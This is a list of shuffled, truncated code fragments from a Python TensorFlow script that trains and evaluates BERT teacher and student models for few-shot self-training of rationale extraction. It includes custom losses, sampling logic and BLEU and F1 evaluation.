{}\".format(tp/(tp+fp+fn))) score1, score2, score3, score4 = 0.0, 0.0, 0.0,", "'joint': # or 'joint_neg' in type_: test_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.ones(len(y_dev))],", "learning. This code base is adapted from UST (https://github.com/microsoft/UST) \"\"\" from collections import", "score: {}\".format(precision_recall_fscore_support(acc, y_test[:,0], average='micro'))) logger.info(\"Best token acc score: {}\".format(precision_recall_fscore_support(y_pred, y_test[:,1:], average='macro'))) pred, truth", "and y to train and dev with valid_split if valid_split > 0: train_size", "return cce_loss + 0.01*l1_loss + 0.01*coh_loss def custom_loss_neg(y_true, y_pred): cce = tf.keras.losses.CategoricalCrossentropy(from_logits=False, reduction=tf.keras.losses.Reduction.NONE)", "= {\"input_ids_r\": X_sample['input_ids'][indices], \"token_type_ids_r\": X_sample['token_type_ids'][indices], \"attention_mask_r\": X_sample['attention_mask'][indices]} if '_neg' in type_: X_neg_rationale_batch =", "(student model): {} \".format(score4/len(pred))) data = [] for i in range(len(X_test[\"input_ids\"])): text =", "+ 0.01*l1_loss + 0.01*coh_loss def custom_loss_neg(y_true, y_pred): cce = tf.keras.losses.CategoricalCrossentropy(from_logits=False, reduction=tf.keras.losses.Reduction.NONE) return tf.reduce_sum(cce(y_true,", "axis=-1).numpy(), axis=-1) y_pred = np.argmax(y_pred, axis=-1) #.flatten() acc = np.argmax(acc, axis=-1) elif 'joint'", "1.0] ''' if '_noexp' in type_: loss_weights = [1.0, 0, 0, 0] elif", "type_: X_negation_sample = {\"input_ids\": np.array(X_unlabeled_sample[\"input_ids\"]), \"token_type_ids\": np.array(X_unlabeled_sample['token_type_ids']), \"attention_mask\": negation_mask} for i in range(len(y_pred)):", "restore_best_weights=True)]) #, class_weight=class_weight) val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))]) elif", "weights=(0, 0, 1, 0)) score4 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(0, 0, 0, 1)) logger.info(\"BLEU-1 score", "= logging.getLogger('STRationale') def create_learning_rate_scheduler(max_learn_rate=5e-5, end_learn_rate=1e-7, warmup_epoch_count=10, total_epoch_count=90): def lr_scheduler(epoch): if epoch < warmup_epoch_count:", "set (teacher model): {} \".format(score1/len(pred))) logger.info(\"BLEU-2 score of rationales on test set (teacher", "np.argmax(acc1, axis=-1) r_acc1 = np.argmax(r_acc1, axis=-1) logger.info(\"Model performance for token (macro/task): {}\".format(precision_recall_fscore_support(y_pred1, y_test[:,1:],", "logger.info(\"Extracted rationale from teacher model as input for task: {}\".format(X_negation_sample[\"input_ids\"][:5])) y_mean, y_var, y_T", "tf.nn.softmax(X_conf[:,0], axis=0) if '_r_' in type_: #re-weight rationales X_conf[:,1:] = np.where(log_rationale>0, log_rationale, 0.000000001)", "run {} : {}\".format(counter, test_acc)) logger.info (\"Best Test task acc for run {}", "= np.argmax(class_acc, axis=-1) logger.info(\"Class predictions shape {}\".format(class_acc.shape)) logger.info(\"Teacher model best score (macro/task): {}\".format(precision_recall_fscore_support(class_acc,", "'_neg' in type_: X_neg_rationale_batch = {\"input_ids_neg\": X_negation_sample['input_ids'][indices], \"token_type_ids_neg\": X_negation_sample['token_type_ids'][indices], \"attention_mask_neg\": X_negation_sample['attention_mask'][indices]} elif 'joint'", "return tf.reduce_sum(cce(y_true, y_pred))*(1/(unsup_batch_size*gpus)) model = models.construct_teacher_joint_neg(TFModel, Config, pt_teacher_checkpoint, max_seq_length, len(labels), dense_dropout=dense_dropout, attention_probs_dropout_prob=attention_probs_dropout_prob, hidden_dropout_prob=hidden_dropout_prob)", "1: temp_p.append(temp[j]) if y_test[i][j+1] == 1: temp_t.append(temp[j]) pred_1 += test_pred[i].sum() pred_0+= max_seq_length-pred_1 truth_1", "X_sample = {\"input_ids\": X_sample['input_ids'][indices], \"token_type_ids\": X_sample['token_type_ids'][indices], \"attention_mask\": X_sample['attention_mask'][indices]} ''' #acc = acc[:,None] #y_batch", "= [1.0, 1.0, 0, 0] model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier':rat_loss, 'rationale_task_classifier': None, 'not_rationale_task_classifier':", "# or 'joint_neg' in type_: test_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.ones(len(y_dev))], verbose=0)[-2]", "deepcopy(model) ''' if test_acc > max_test_acc: max_test_acc = test_acc test_task_acc = model.evaluate(X_test, [y_test[:,0],", "= {\"input_ids\": X[\"input_ids\"][:train_size], \"token_type_ids\": X[\"token_type_ids\"][:train_size], \"attention_mask\": X[\"attention_mask\"][:train_size]}, y[:train_size] X_dev, y_dev = {\"input_ids\": X[\"input_ids\"][train_size:],", "callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_loss', patience=5, restore_best_weights=True)]) #, class_weight=class_weight) val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.full((len(y_dev), len(labels)),", "X[\"token_type_ids\"][train_size:], \"attention_mask\": X[\"attention_mask\"][train_size:]}, y[train_size:] else: X_train, y_train = X, y X_dev, y_dev =", "unsup_batch_size=32, unsup_size=4096, sample_size=16384, TFModel=TFBertModel, Config=BertConfig, pt_teacher_checkpoint='bert-base-uncased', sample_scheme='easy_bald_class_conf', T=30, alpha=0.1, valid_split=0.5, sup_epochs=70, unsup_epochs=25, N_base=10,", "out = model.predict(X_unlabeled, batch_size=64) acc, y_pred, r_acc = out[0], out[1], out[2] #y_val =", "models import numpy as np import os, sys import json import nltk import", "1.0] if '_noexp' in type_: loss_weights = [1.0, 0.0, 0.0, 0.0] elif '_no_suffcomp'", "#to skip evaluation of the task label temp_t.append(temp[j]) pred_1 += test_pred[i].sum() pred_0+= max_seq_length-pred_1", "y_pred = {\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\": X_unlabeled_sample['attention_mask'][indices]}, y_pred[indices] if type_ == 'decoupled'", "for without rationales\") with strategy.scope(): def custom_loss(y_true, y_pred): cce = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True, reduction=tf.keras.losses.Reduction.NONE) tf.print(tf.size(y_true),", "y_dev[:,1:]]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc', patience=5, restore_best_weights=True)]) #, sample_weight=[X_conf[:,0], X_conf[:,1:]]) elif type_ == 'joint': logger.info(type_)", "= np.argmax(y_pred, axis=-1) acc = np.argmax(acc, axis=-1) #logger.info(\"Micro score (task): {}\".format(precision_recall_fscore_support(acc, y_test[:,0], average='micro')))", "y X_dev, y_dev = X_dev, y_dev logger.info(\"X Train Shape: {} {}\".format(X_train[\"input_ids\"].shape, y_train.shape)) logger.info(\"X", "Unlabeled Shape: {}\".format(X_unlabeled[\"input_ids\"].shape)) strategy = tf.distribute.MirroredStrategy() gpus = strategy.num_replicas_in_sync logger.info('Number of devices: {}'.format(gpus))", "np.full((len(y_dev), len(labels)), 1/len(labels))]) elif 'joint' in type_: _placeholder_labels = np.empty((y_train.shape[0], y_train.shape[0])) model.fit(x=X_train, y=[y_train[:,0],", "[y_test[:,0], y_test[:,1:]], verbose=0)[3] val_loss = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[0] elif '_neg' in type_:", "type_: X_neg_rationale_batch = {\"input_ids_neg\": X_negation_sample['input_ids'][indices], \"token_type_ids_neg\": X_negation_sample['token_type_ids'][indices], \"attention_mask_neg\": X_negation_sample['attention_mask'][indices]} ''' probs = y_val[indices]", "'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'not_rationale_task_classifier':None}, loss_weights=loss_weights) X_batch['input_ids_r'], X_batch['token_type_ids_r'], X_batch['attention_mask_r'] = X_rationale_batch['input_ids_r'], X_rationale_batch['token_type_ids_r'], X_rationale_batch['attention_mask_r'] X_batch['input_ids_neg'], X_batch['token_type_ids_neg'],", "loss_weights=loss_weights) y_neg = np.full((len(y_train),len(labels)), 1/len(labels)) model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:], y_train[:,0], y_neg], shuffle=True, epochs=sup_epochs, validation_data=(X_dev,", "y_train = {\"input_ids\": X[\"input_ids\"][:train_size], \"token_type_ids\": X[\"token_type_ids\"][:train_size], \"attention_mask\": X[\"attention_mask\"][:train_size], \"input_ids_r\":X[\"input_ids_r\"][:train_size], \"token_type_ids_r\":X[\"token_type_ids_r\"][:train_size], \"attention_mask_r\":X[\"attention_mask_r\"][:train_size], \"input_ids_neg\":X[\"input_ids_neg\"][:train_size], \"token_type_ids_neg\":X[\"token_type_ids_neg\"][:train_size],", "> max_test_acc: max_test_acc = test_acc test_task_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], np.ones(len(y_test))], verbose=0)[-3]", "rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) def custom_loss(y_true, y_pred): cce = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True, reduction=tf.keras.losses.Reduction.NONE) if 'focal' in", "strategy.scope(): model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'l2_distance': custom_loss}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")],", "#model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_task_classifier': None, 'l2_distance': custom_loss}, metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"), tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"), tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"),", "unlabeled examples\") X_batch = {\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\": X_unlabeled_sample['attention_mask'][indices]} if 'joint' in", "'mtl' in type_: acc, y_pred = model.predict(X_unlabeled_sample, batch_size=256) y_val = np.amax(tf.math.softmax(acc, axis=-1).numpy(), axis=-1)", "res = max_learn_rate*math.exp(math.log(end_learn_rate/max_learn_rate)*(epoch-warmup_epoch_count+1)/(total_epoch_count-warmup_epoch_count+1)) return float(res) learning_rate_scheduler = tf.keras.callbacks.LearningRateScheduler(lr_scheduler, verbose=1) return learning_rate_scheduler def train_model(max_seq_length,", "different initialization to select best base model based on validation loss best_base_model =", "in type_: class_acc = model.predict(X_test)[0] test_pred = model.predict(X_test)[1] class_acc = np.argmax(class_acc, axis=-1) elif", "#logger.info(y_pred.shape) #logger.info(\"Percentage of rationales selected: {}\".format(np.mean(np.sum(attention_mask_r, axis=-1)))) attention_mask_r[:,0] = 1 negation_mask = np.where(attention_mask_r==0,", "y_pred[indices][:, 1:]), axis=1) logger.info(\"y_batch shape: {}\".format(y_batch.shape)) #X_batch, y_batch, X_conf = f_(tokenizer, X_unlabeled_sample, y_mean,", "nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(0, 1, 0, 0)) score3 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(0, 0, 1, 0)) score4", "model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[-2] test_task_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[-2] elif 'joint_neg' in", "y_pred[indices]), axis=1) X_batch = {\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\": X_unlabeled_sample['attention_mask'][indices]} if 'joint' in", "verbose=0)[-2] task_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.ones(len(y_dev))], verbose=0)[-3] val_loss = model.evaluate(X_dev, [y_dev[:,0],", "negation_mask = np.where(attention_mask_r==0, 1, 0) negation_mask[:,0] = 1 X_sample = {\"input_ids\": np.array(X_unlabeled_sample[\"input_ids\"]), \"token_type_ids\":", "model_file_task = os.path.join(model_dir, \"model_task.h5\") model_file_best = os.path.join(model_dir, \"model_best.h5\") if os.path.exists(model_file): model.load_weights(model_file) #model_task.load_weights(model_file_task) best_base_model", "Predictions shape {}\".format(test_pred.shape)) pred, truth = [], [] logger.info(test_pred) test_pred = np.argmax(tf.nn.softmax(test_pred, axis=-1),", "test_acc test_task_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], y_neg_test], verbose=0)[-3] elif type_ == 'joint':", "= model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[-2] test_task_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[-2] elif 'joint_neg'", "= X_neg_rationale_batch['input_ids_neg'], X_neg_rationale_batch['token_type_ids_neg'], X_neg_rationale_batch['attention_mask_neg'] model.fit(x=X_batch, y=[y_batch[:,0], y_batch[:,1:], y_batch[:, 0], np.full((len(y_batch),len(labels)), 1/len(labels))], shuffle=True, epochs=unsup_epochs,", "X_dev, y_dev = X_dev, y_dev logger.info(\"X Train Shape: {} {}\".format(X_train[\"input_ids\"].shape, y_train.shape)) logger.info(\"X Dev", "u-r if '_neg' in type_: X_negation_sample = {\"input_ids\": np.array(X_unlabeled_sample[\"input_ids\"]), \"token_type_ids\": np.array(X_unlabeled_sample['token_type_ids']), \"attention_mask\": negation_mask}", "#.flatten() acc = np.argmax(acc, axis=-1) r_acc = np.argmax(r_acc, axis=-1) #compute confidence on the", "for joint {}\".format(temp)) logger.info (\"Val acc (token) {}\".format(test_acc)) logger.info (\"Val acc (task) {}\".format(task_acc))", "task: {}\".format(X_sample[\"input_ids\"][:5])) logger.info(\"Extracted rationale from teacher model as input for task: {}\".format(X_negation_sample[\"input_ids\"][:5])) y_mean,", "[1.0, 0.0] else: loss_weights = [0.5, 0.5] with strategy.scope(): model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss=[tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), rat_loss],", "'_neg' in type_: X_negation_sample[\"input_ids\"][i, 1:] = np.where(y_pred[i]==0, X_negation_sample[\"input_ids\"][i, 1:], 103) X_negation_sample[\"input_ids\"][:,0] = 101", "in range(len(X_test[\"input_ids\"])): text = tokenizer.decode(X_test[\"input_ids\"][i]) temp = dict() temp['text'] = text temp['truth'] =", "in type_: loss_weights = [1.0, 1.0, 0, 0] model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier':rat_loss,", "return float(res) learning_rate_scheduler = tf.keras.callbacks.LearningRateScheduler(lr_scheduler, verbose=1) return learning_rate_scheduler def train_model(max_seq_length, X, y, X_test,", "[] for i in range(len(X_test[\"input_ids\"])): text = tokenizer.convert_ids_to_tokens(X_test[\"input_ids\"][i]) temp = dict() temp['text'] =", "type_: #re-weight rationales X_conf[:,1:] = np.where(log_rationale>0, log_rationale, 0.000000001) if 'norm' in type_: X_conf[:,1:]", "axis=-1) elif 'joint' in type_: out = model.predict(X_unlabeled, batch_size=64) acc, y_pred, r_acc =", "model_file_best = os.path.join(model_dir, \"model_best.h5\") if os.path.exists(model_file): model.load_weights(model_file) #model_task.load_weights(model_file_task) best_base_model = model logger.info (\"Model", "focal_loss import BinaryFocalLoss, SparseCategoricalFocalLoss import random from sklearn.metrics import f1_score from sklearn.metrics import", "1)) logger.info(\"BLEU-1 score of rationales on test set (student model): {} \".format(score1/len(pred))) logger.info(\"BLEU-2", "model = models.construct_teacher_joint(TFModel, Config, pt_teacher_checkpoint, max_seq_length, len(labels), dense_dropout=dense_dropout, attention_probs_dropout_prob=attention_probs_dropout_prob, hidden_dropout_prob=hidden_dropout_prob) model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier':", "model_file_task = os.path.join(model_dir, \"model_task_{}_{}.h5\".format(epoch, sample_scheme)) if os.path.exists(model_file): model.load_weights(model_file) logger.info (\"Model file loaded from", "type_: acc = acc[:,None] y_batch = np.concatenate((acc[indices], y_pred[indices][:, 1:]), axis=1) logger.info(\"y_batch shape: {}\".format(y_batch.shape))", "= tokenizer.convert_ids_to_tokens(X_test[\"input_ids\"][i]) temp = dict() temp['text'] = ' '.join(text) temp['truth'] = truth[i] temp['pred']", "y_pred, r_acc = out[0], out[1], out[2] logger.info(\"Raw logits: {}\".format(acc)) y_pred = np.argmax(y_pred, axis=-1)", "if 'mtl' in type_ : acc, y_pred = model.predict(X_unlabeled, batch_size=256) #y_val = np.amax(acc,", "np.argmax(y_pred, axis=-1) #.flatten() acc = np.argmax(acc, axis=-1) elif 'joint' in type_: out =", "(task): {}\".format(precision_recall_fscore_support(acc, y_test[:,0], average='micro'))) elif 'joint' in type_: out = model_student.predict(X_test) acc, y_pred,", "'joint' in type_: ids = [] attention_mask_r = np.ones((len(y_pred), max_seq_length)) attention_mask_r[:,1:] = np.array(y_pred)", "[0, 1] #fix hardcoding labels = set(y[:,0]) logger.info (\"Class labels {}\".format(labels)) #split X", "elif 'joint' in type_: out = model_student.predict(X_test) acc, y_pred, r_acc = out[0], out[1],", "type_: acc, y_pred = model_student.predict(X_test) y_pred = np.argmax(y_pred, axis=-1) acc = np.argmax(acc, axis=-1)", "None, 'l2_distance': custom_loss}, metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"), tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"), tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"), tf.keras.metrics.Mean(name='mean')]) #X_batch.update(X_rationale_batch) X_batch['input_ids_r'], X_batch['token_type_ids_r'], X_batch['attention_mask_r'] = X_rationale_batch['input_ids_r'],", "restore_best_weights=True)]) # class_weight=class_weight) val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))]) logger.info (\"Validation loss", "= out1[0], out1[1], out1[2] y_pred1 = np.argmax(y_pred1, axis=-1) acc1 = np.argmax(acc1, axis=-1) r_acc1", "verbose=0)[-2] task_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], y_neg_dev], verbose=0)[-3] out1 = model.predict(X_test) acc1,", "if '_neg' in type_: X_neg_rationale_batch = {\"input_ids_neg\": X_negation_sample['input_ids'][indices], \"token_type_ids_neg\": X_negation_sample['token_type_ids'][indices], \"attention_mask_neg\": X_negation_sample['attention_mask'][indices]} else:", "logger.info (\"Model file saved to {}\".format(model_file)) best_val_acc = 0. best_test_acc = 0. max_test_acc", "model as input for task: {}\".format(X_negation_sample[\"input_ids\"][:5])) y_mean, y_var, y_T = None, None, None", "X_negation_sample['input_ids'][indices], \"token_type_ids_neg\": X_negation_sample['token_type_ids'][indices], \"attention_mask_neg\": X_negation_sample['attention_mask'][indices]} else: indices = np.array([i for i in range(len(y_pred))])", "score of rationales on test set (teacher model): {} \".format(score2/len(pred))) logger.info(\"BLEU-3 score of", "y_pred), axis=1) logging.info(\"y_batch shape {}\".format(y_batch.shape)) indices = [] for i in labels: indx", "rat_loss], metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"dense_3_classification_acc\")])#, tf.keras.metrics.SparseCategoricalAccuracy(name=\"token_acc\")]) #, sample_weight_mode=\"temporal\") model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:]], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:]]),", "(probs_rat+1e-10) if 'rwt' in type_: #re-weight labels X_conf[:,0] = np.where(log_probs>0, log_probs, 0.00000001) if", "\"token_type_ids_neg\":X[\"token_type_ids_neg\"][:train_size], \"attention_mask_neg\":X[\"attention_mask_neg\"][:train_size]}, y[:train_size] X_dev, y_dev = {\"input_ids\": X[\"input_ids\"][train_size:], \"token_type_ids\": X[\"token_type_ids\"][train_size:], \"attention_mask\": X[\"attention_mask\"][train_size:], \"input_ids_r\":X[\"input_ids_r\"][train_size:],", "model = models.construct_teacher_mtl(TFModel, Config, pt_teacher_checkpoint, max_seq_length, len(labels), dense_dropout=dense_dropout, attention_probs_dropout_prob=attention_probs_dropout_prob, hidden_dropout_prob=hidden_dropout_prob) model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss=[tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),", "temp = tokenizer.convert_ids_to_tokens(X_test[\"input_ids\"][i])[1:] for j in range(0,len(test_pred[0])-1): if test_pred[i][j] == 1: temp_p.append(temp[j]) if", "tf.keras.metrics.Mean(name='mean')]) #X_batch.update(X_rationale_batch) X_batch['input_ids_r'], X_batch['token_type_ids_r'], X_batch['attention_mask_r'] = X_rationale_batch['input_ids_r'], X_rationale_batch['token_type_ids_r'], X_rationale_batch['attention_mask_r'] model.fit(x=X_batch, y=[y_batch[:,0], y_batch, y_batch[:,", "1.0, 0, 0] model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier':rat_loss, 'rationale_task_classifier': None, 'not_rationale_task_classifier': None}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")],", "nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(0, 0, 0, 1)) logger.info(\"BLEU-1 score of rationales on test set (teacher", "data = [] for i in range(len(X_test[\"input_ids\"])): text = tokenizer.decode(X_test[\"input_ids\"][i]) temp = dict()", "attention_probs_dropout_prob=attention_probs_dropout_prob, hidden_dropout_prob=hidden_dropout_prob) model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier':tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_task_classifier': None, 'l2_distance': None}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")],", "= X_dev, y_dev logger.info(\"X Train Shape: {} {}\".format(X_train[\"input_ids\"].shape, y_train.shape)) logger.info(\"X Dev Shape: {}", "None if 'focal' in type_: rat_loss = SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) def", "1/len(labels))], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_loss', patience=5,", "as tfa from focal_loss import BinaryFocalLoss, SparseCategoricalFocalLoss import random from sklearn.metrics import f1_score", "hidden_dropout_prob=hidden_dropout_prob) model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier':tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_task_classifier': None, 'l2_distance': None}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")],", "in type_: temp = model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], np.ones(len(y_test))], verbose=0) elif 'mtl' in", "if test_acc > max_test_acc: max_test_acc = test_acc test_task_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0],", "axis=-1) r_acc = np.argmax(r_acc, axis=-1) logger.info(\"Best task acc score: {}\".format(precision_recall_fscore_support(acc, y_test[:,0], average='micro'))) logger.info(\"Best", "{\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\": X_unlabeled_sample['attention_mask'][indices]} if 'joint' in type_: X_rationale_batch = {\"input_ids_r\":", "{} {}\".format(X_test[\"input_ids\"].shape, y_test.shape)) logger.info (\"X Unlabeled Shape: {}\".format(X_unlabeled[\"input_ids\"].shape)) strategy = tf.distribute.MirroredStrategy() gpus =", "X_negation_sample[\"input_ids\"][i, 1:], 103) X_negation_sample[\"input_ids\"][:,0] = 101 X_sample[\"input_ids\"][:,0] = 101 logger.info(\"Extracted rationale from teacher", "y_dev.shape)) logger.info(\"X Test Shape: {} {}\".format(X_test[\"input_ids\"].shape, y_test.shape)) logger.info (\"X Unlabeled Shape: {}\".format(X_unlabeled[\"input_ids\"].shape)) strategy", "np.amax(y_pred, axis=-1) y_pred = np.argmax(y_pred, axis=-1) #.flatten() acc = np.argmax(acc, axis=-1) r_acc =", "<NAME> (<EMAIL>) Code for Self-training for Rationale using few-shot learning. This code base", "shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:]]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='dense_3_classification_acc', patience=5, restore_best_weights=True)], sample_weight=[X_conf[:,0], X_conf[:,1:]]) if 'fine_tune_teacher'", "student model for run {}: {}\".format(counter, test_pred)) tp, fn, fp = 0, 0,", "logger.info (\"Validation loss for run {} : {}\".format(counter, val_loss)) if val_loss[0] < best_validation_loss:", "1/len(labels))]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc', patience=5, restore_best_weights=True)]) # class_weight=class_weight) tf.keras.backend.clear_session() if not os.path.exists(model_file): model.save_weights(model_file) logger.info", "103) X_negation_sample[\"input_ids\"][:,0] = 101 X_sample[\"input_ids\"][:,0] = 101 logger.info(\"Extracted rationale from teacher model as", "score of rationales on test set (teacher model): {} \".format(score3/len(pred))) logger.info(\"BLEU-4 score of", "y_dev[:,1:], y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_loss', patience=5, restore_best_weights=True)], sample_weight=[X_conf[:,0], X_conf[:,1:], X_conf[:,0], np.ones((len(y_batch)))])", "= SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) loss_weights = [1.0, 1.0, 1.0, 1.0] '''", "0: train_size = int((1. - valid_split)*len(X[\"input_ids\"])) if '_neg' in type_: X_train, y_train =", "0, 0, 0)) score2 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(0, 1, 0, 0)) score3 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(),", "input for task: {}\".format(X_negation_sample[\"input_ids\"][:5])) y_mean, y_var, y_T = None, None, None if 'mtl'", "axis=0)) #l2_loss = 0.0 #logger.info(l1_loss) return cce_loss + 0.01*l1_loss + 0.01*coh_loss def custom_loss_neg(y_true,", "rat_loss = None if 'focal' in type_: rat_loss = SparseCategoricalFocalLoss(gamma=2) else: rat_loss =", "loss_weights = [1.0, 0.0, 0.0, 0.0] elif '_no_suffcomp' in type_: loss_weights = [1.0,", "indices = np.random.choice(len(X_unlabeled[\"input_ids\"]), sample_size, replace=False) if '_neg' in type_: X_unlabeled_sample, y_pred = {'input_ids':", "labels for class {} : {}\".format(i, len(indx))) indices.extend(indx) indices = np.asarray(indices) #indices =", "(\"Model file saved to {}\".format(model_file)) model_student = model model_student.load_weights(model_file_best) if 'mtl' in type_:", "import tensorflow.keras as K import tensorflow.keras.backend as kb import tensorflow_addons as tfa from", "len(labels)), 1/len(labels))]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_loss', patience=5, restore_best_weights=True)], sample_weight=[X_conf[:,0], X_conf[:,1:], X_conf[:,0], np.ones((len(y_batch)))]) # class_weight=class_weight) if", "in type_: rat_loss = SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) with strategy.scope(): loss_weights =", "on test set (student model): {} \".format(score3/len(pred))) logger.info(\"BLEU-4 score of rationales on test", "if 'pruthi_' in type_: out = y_train acc, y_pred, r_acc = y_train[:,0], y_train[:,1:],", "X[\"token_type_ids\"][train_size:], \"attention_mask\": X[\"attention_mask\"][train_size:], \"input_ids_r\":X[\"input_ids_r\"][train_size:], \"token_type_ids_r\":X[\"token_type_ids_r\"][train_size:], \"attention_mask_r\":X[\"attention_mask_r\"][train_size:]}, y[train_size:] else: X_train, y_train = {\"input_ids\": X[\"input_ids\"][:train_size],", "type_: rat_loss = SparseCategoricalFocalLoss(gamma=2) else: rat_loss = 